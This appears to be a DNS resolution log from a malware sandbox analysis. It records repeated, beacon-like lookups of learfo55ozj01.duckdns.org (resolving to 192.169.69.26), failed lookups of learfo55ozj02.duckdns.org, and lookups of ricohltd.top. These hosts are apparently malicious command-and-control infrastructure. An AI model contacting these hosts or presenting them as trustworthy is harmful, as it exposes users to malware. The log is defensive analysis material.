                                              May 1, 2024 18:22:14.839384079 CEST8.8.8.8192.168.2.220x978cNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:14.934063911 CEST8.8.8.8192.168.2.220x978cNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:15.029266119 CEST8.8.8.8192.168.2.220x978cNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:15.124630928 CEST8.8.8.8192.168.2.220x978cNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:16.920522928 CEST8.8.8.8192.168.2.220xf66aNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:17.015925884 CEST8.8.8.8192.168.2.220xf66aNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:17.110743999 CEST8.8.8.8192.168.2.220xf66aNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:17.206120968 CEST8.8.8.8192.168.2.220xf66aNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:17.302052975 CEST8.8.8.8192.168.2.220xf66aNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:18.605813980 CEST8.8.8.8192.168.2.220x7a40No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:18.700501919 CEST8.8.8.8192.168.2.220x7a40No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:18.795279980 CEST8.8.8.8192.168.2.220x7a40No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:18.890043974 CEST8.8.8.8192.168.2.220x7a40No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:18.985095024 CEST8.8.8.8192.168.2.220x7a40No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:20.044990063 CEST8.8.8.8192.168.2.220x6678No error (0)ricohltd.top172.67.191.112A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:20.044990063 CEST8.8.8.8192.168.2.220x6678No error (0)ricohltd.top104.21.60.38A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:20.294292927 CEST8.8.8.8192.168.2.220xc1e0No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:20.389421940 CEST8.8.8.8192.168.2.220xc1e0No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:20.484117031 CEST8.8.8.8192.168.2.220xc1e0No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:20.578427076 CEST8.8.8.8192.168.2.220xc1e0No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:20.672807932 CEST8.8.8.8192.168.2.220xc1e0No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:20.886296988 CEST8.8.8.8192.168.2.220x6f88No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:20.981192112 CEST8.8.8.8192.168.2.220x6f88No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:21.075824022 CEST8.8.8.8192.168.2.220x6f88No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:21.170401096 CEST8.8.8.8192.168.2.220x6f88No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:21.265077114 CEST8.8.8.8192.168.2.220x6f88No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:27.499444008 CEST8.8.8.8192.168.2.220xc9e8No error (0)ricohltd.top104.21.60.38A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:27.499444008 CEST8.8.8.8192.168.2.220xc9e8No error (0)ricohltd.top172.67.191.112A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:27.527362108 CEST8.8.8.8192.168.2.220x123aNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:27.625325918 CEST8.8.8.8192.168.2.220x123aNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:27.721467972 CEST8.8.8.8192.168.2.220x123aNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:27.819119930 CEST8.8.8.8192.168.2.220x123aNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:27.913990974 CEST8.8.8.8192.168.2.220x123aNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:28.120121956 CEST8.8.8.8192.168.2.220xdfcfNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:28.230268002 CEST8.8.8.8192.168.2.220xdfcfNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:28.329272032 CEST8.8.8.8192.168.2.220xdfcfNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:28.428236961 CEST8.8.8.8192.168.2.220xdfcfNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:28.591701984 CEST8.8.8.8192.168.2.220xdfcfNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:29.516906023 CEST8.8.8.8192.168.2.220x980cName error (3)learfo55ozj02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:29.611677885 CEST8.8.8.8192.168.2.220x980cName error (3)learfo55ozj02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:29.706701994 CEST8.8.8.8192.168.2.220x980cName error (3)learfo55ozj02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:29.801151037 CEST8.8.8.8192.168.2.220x980cName error (3)learfo55ozj02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:30.006325960 CEST8.8.8.8192.168.2.220x980cName error (3)learfo55ozj02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:34.600285053 CEST8.8.8.8192.168.2.220x9d71No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:34.695225954 CEST8.8.8.8192.168.2.220x9d71No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:34.789722919 CEST8.8.8.8192.168.2.220x9d71No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:34.886692047 CEST8.8.8.8192.168.2.220x9d71No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:34.983556986 CEST8.8.8.8192.168.2.220x9d71No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:35.097126007 CEST8.8.8.8192.168.2.220x56e7Name error (3)learfo55ozj02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:35.192363977 CEST8.8.8.8192.168.2.220x56e7Name error (3)learfo55ozj02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:35.291147947 CEST8.8.8.8192.168.2.220x56e7Name error (3)learfo55ozj02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:35.387228966 CEST8.8.8.8192.168.2.220x56e7Name error (3)learfo55ozj02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:35.483145952 CEST8.8.8.8192.168.2.220x56e7Name error (3)learfo55ozj02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:36.803980112 CEST8.8.8.8192.168.2.220xf573No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:36.898495913 CEST8.8.8.8192.168.2.220xf573No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:36.996854067 CEST8.8.8.8192.168.2.220xf573No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:37.091813087 CEST8.8.8.8192.168.2.220xf573No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:37.187414885 CEST8.8.8.8192.168.2.220xf573No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:37.290445089 CEST8.8.8.8192.168.2.220x4950Name error (3)learfo55ozj02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:37.388025045 CEST8.8.8.8192.168.2.220x4950Name error (3)learfo55ozj02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:37.486912966 CEST8.8.8.8192.168.2.220x4950Name error (3)learfo55ozj02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:37.582844973 CEST8.8.8.8192.168.2.220x4950Name error (3)learfo55ozj02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:37.678781033 CEST8.8.8.8192.168.2.220x4950Name error (3)learfo55ozj02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:38.915643930 CEST8.8.8.8192.168.2.220x9875No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:39.011465073 CEST8.8.8.8192.168.2.220x9875No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:39.106447935 CEST8.8.8.8192.168.2.220x9875No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:39.200860977 CEST8.8.8.8192.168.2.220x9875No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:39.295669079 CEST8.8.8.8192.168.2.220x9875No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:39.410255909 CEST8.8.8.8192.168.2.220x6810No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:39.505004883 CEST8.8.8.8192.168.2.220x6810No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:39.599780083 CEST8.8.8.8192.168.2.220x6810No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:39.694116116 CEST8.8.8.8192.168.2.220x6810No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:39.788772106 CEST8.8.8.8192.168.2.220x6810No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:40.226686954 CEST8.8.8.8192.168.2.220x769aName error (3)learfo55ozj02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:40.321182966 CEST8.8.8.8192.168.2.220x769aName error (3)learfo55ozj02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:40.416328907 CEST8.8.8.8192.168.2.220x769aName error (3)learfo55ozj02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:40.511493921 CEST8.8.8.8192.168.2.220x769aName error (3)learfo55ozj02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:40.605897903 CEST8.8.8.8192.168.2.220x769aName error (3)learfo55ozj02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:41.749278069 CEST8.8.8.8192.168.2.220x2b75No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:41.845454931 CEST8.8.8.8192.168.2.220x2b75No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:41.941804886 CEST8.8.8.8192.168.2.220x2b75No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:42.037432909 CEST8.8.8.8192.168.2.220x2b75No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:42.132721901 CEST8.8.8.8192.168.2.220x2b75No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:42.402503014 CEST8.8.8.8192.168.2.220x4611No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:42.497694016 CEST8.8.8.8192.168.2.220x4611No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:42.592390060 CEST8.8.8.8192.168.2.220x4611No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:42.687483072 CEST8.8.8.8192.168.2.220x4611No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:42.782213926 CEST8.8.8.8192.168.2.220x4611No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:43.052886963 CEST8.8.8.8192.168.2.220x3d6bName error (3)learfo55ozj02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:43.147329092 CEST8.8.8.8192.168.2.220x3d6bName error (3)learfo55ozj02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:43.241799116 CEST8.8.8.8192.168.2.220x3d6bName error (3)learfo55ozj02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:43.336113930 CEST8.8.8.8192.168.2.220x3d6bName error (3)learfo55ozj02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:43.430495024 CEST8.8.8.8192.168.2.220x3d6bName error (3)learfo55ozj02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:44.575793982 CEST8.8.8.8192.168.2.220x502cNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:44.670814037 CEST8.8.8.8192.168.2.220x502cNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:44.765389919 CEST8.8.8.8192.168.2.220x502cNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:44.864962101 CEST8.8.8.8192.168.2.220x502cNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:44.959405899 CEST8.8.8.8192.168.2.220x502cNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:46.408247948 CEST8.8.8.8192.168.2.220x34f3No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:46.503927946 CEST8.8.8.8192.168.2.220x34f3No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:46.601465940 CEST8.8.8.8192.168.2.220x34f3No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:46.697170973 CEST8.8.8.8192.168.2.220x34f3No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:46.796214104 CEST8.8.8.8192.168.2.220x34f3No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:46.940078974 CEST8.8.8.8192.168.2.220xf27fNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:47.034826994 CEST8.8.8.8192.168.2.220xf27fNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:47.129460096 CEST8.8.8.8192.168.2.220xf27fNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:47.228118896 CEST8.8.8.8192.168.2.220xf27fNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:47.323602915 CEST8.8.8.8192.168.2.220xf27fNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:47.445822001 CEST8.8.8.8192.168.2.220xae8aName error (3)learfo55ozj02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:47.543581009 CEST8.8.8.8192.168.2.220xae8aName error (3)learfo55ozj02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:47.648475885 CEST8.8.8.8192.168.2.220xae8aName error (3)learfo55ozj02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:47.743983030 CEST8.8.8.8192.168.2.220xae8aName error (3)learfo55ozj02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:47.839170933 CEST8.8.8.8192.168.2.220xae8aName error (3)learfo55ozj02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:48.956727982 CEST8.8.8.8192.168.2.220x73faNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:49.051152945 CEST8.8.8.8192.168.2.220x73faNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:49.145638943 CEST8.8.8.8192.168.2.220x73faNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:49.240231991 CEST8.8.8.8192.168.2.220x73faNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:49.337512016 CEST8.8.8.8192.168.2.220x73faNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:49.442820072 CEST8.8.8.8192.168.2.220x9affNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:49.541452885 CEST8.8.8.8192.168.2.220x9affNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:49.637514114 CEST8.8.8.8192.168.2.220x9affNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:49.737502098 CEST8.8.8.8192.168.2.220x9affNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:49.832015038 CEST8.8.8.8192.168.2.220x9affNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:49.937618971 CEST8.8.8.8192.168.2.220xfe72Name error (3)learfo55ozj02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:50.032835960 CEST8.8.8.8192.168.2.220xfe72Name error (3)learfo55ozj02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:50.127928972 CEST8.8.8.8192.168.2.220xfe72Name error (3)learfo55ozj02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:50.222654104 CEST8.8.8.8192.168.2.220xfe72Name error (3)learfo55ozj02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:50.317847967 CEST8.8.8.8192.168.2.220xfe72Name error (3)learfo55ozj02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:51.464852095 CEST8.8.8.8192.168.2.220xd0c1No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:51.559847116 CEST8.8.8.8192.168.2.220xd0c1No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:51.674386978 CEST8.8.8.8192.168.2.220xd0c1No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:51.769714117 CEST8.8.8.8192.168.2.220xd0c1No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:51.864157915 CEST8.8.8.8192.168.2.220xd0c1No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:51.969091892 CEST8.8.8.8192.168.2.220xe166No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:52.089922905 CEST8.8.8.8192.168.2.220xe166No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:52.202805042 CEST8.8.8.8192.168.2.220xe166No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:52.298156977 CEST8.8.8.8192.168.2.220xe166No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:52.393877029 CEST8.8.8.8192.168.2.220xe166No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:52.498246908 CEST8.8.8.8192.168.2.220x1acName error (3)learfo55ozj02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:52.594079018 CEST8.8.8.8192.168.2.220x1acName error (3)learfo55ozj02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:52.689183950 CEST8.8.8.8192.168.2.220x1acName error (3)learfo55ozj02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:52.802944899 CEST8.8.8.8192.168.2.220x1acName error (3)learfo55ozj02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:52.897597075 CEST8.8.8.8192.168.2.220x1acName error (3)learfo55ozj02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:54.009882927 CEST8.8.8.8192.168.2.220x3218No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:54.104612112 CEST8.8.8.8192.168.2.220x3218No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:54.199695110 CEST8.8.8.8192.168.2.220x3218No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:54.296776056 CEST8.8.8.8192.168.2.220x3218No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:54.391719103 CEST8.8.8.8192.168.2.220x3218No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:54.493885994 CEST8.8.8.8192.168.2.220xb5aNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:54.591691017 CEST8.8.8.8192.168.2.220xb5aNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:54.687007904 CEST8.8.8.8192.168.2.220xb5aNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:54.782144070 CEST8.8.8.8192.168.2.220xb5aNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:54.876624107 CEST8.8.8.8192.168.2.220xb5aNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:54.985073090 CEST8.8.8.8192.168.2.220x41fbName error (3)learfo55ozj02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:55.079838991 CEST8.8.8.8192.168.2.220x41fbName error (3)learfo55ozj02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:55.177932978 CEST8.8.8.8192.168.2.220x41fbName error (3)learfo55ozj02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:55.277726889 CEST8.8.8.8192.168.2.220x41fbName error (3)learfo55ozj02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:55.376861095 CEST8.8.8.8192.168.2.220x41fbName error (3)learfo55ozj02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:56.492283106 CEST8.8.8.8192.168.2.220xc3fdNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:56.591569901 CEST8.8.8.8192.168.2.220xc3fdNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:56.686203003 CEST8.8.8.8192.168.2.220xc3fdNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:56.781416893 CEST8.8.8.8192.168.2.220xc3fdNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:56.878818035 CEST8.8.8.8192.168.2.220xc3fdNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:56.983673096 CEST8.8.8.8192.168.2.220x62c5No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:57.100977898 CEST8.8.8.8192.168.2.220x62c5No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:57.198795080 CEST8.8.8.8192.168.2.220x62c5No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:57.297602892 CEST8.8.8.8192.168.2.220x62c5No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:57.392445087 CEST8.8.8.8192.168.2.220x62c5No error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:57.496850014 CEST8.8.8.8192.168.2.220xb7ffName error (3)learfo55ozj02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:57.597862005 CEST8.8.8.8192.168.2.220xb7ffName error (3)learfo55ozj02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:57.692558050 CEST8.8.8.8192.168.2.220xb7ffName error (3)learfo55ozj02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:57.786983013 CEST8.8.8.8192.168.2.220xb7ffName error (3)learfo55ozj02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:57.885893106 CEST8.8.8.8192.168.2.220xb7ffName error (3)learfo55ozj02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:59.019301891 CEST8.8.8.8192.168.2.220x34cbNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:59.114458084 CEST8.8.8.8192.168.2.220x34cbNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:59.209803104 CEST8.8.8.8192.168.2.220x34cbNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:59.316539049 CEST8.8.8.8192.168.2.220x34cbNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
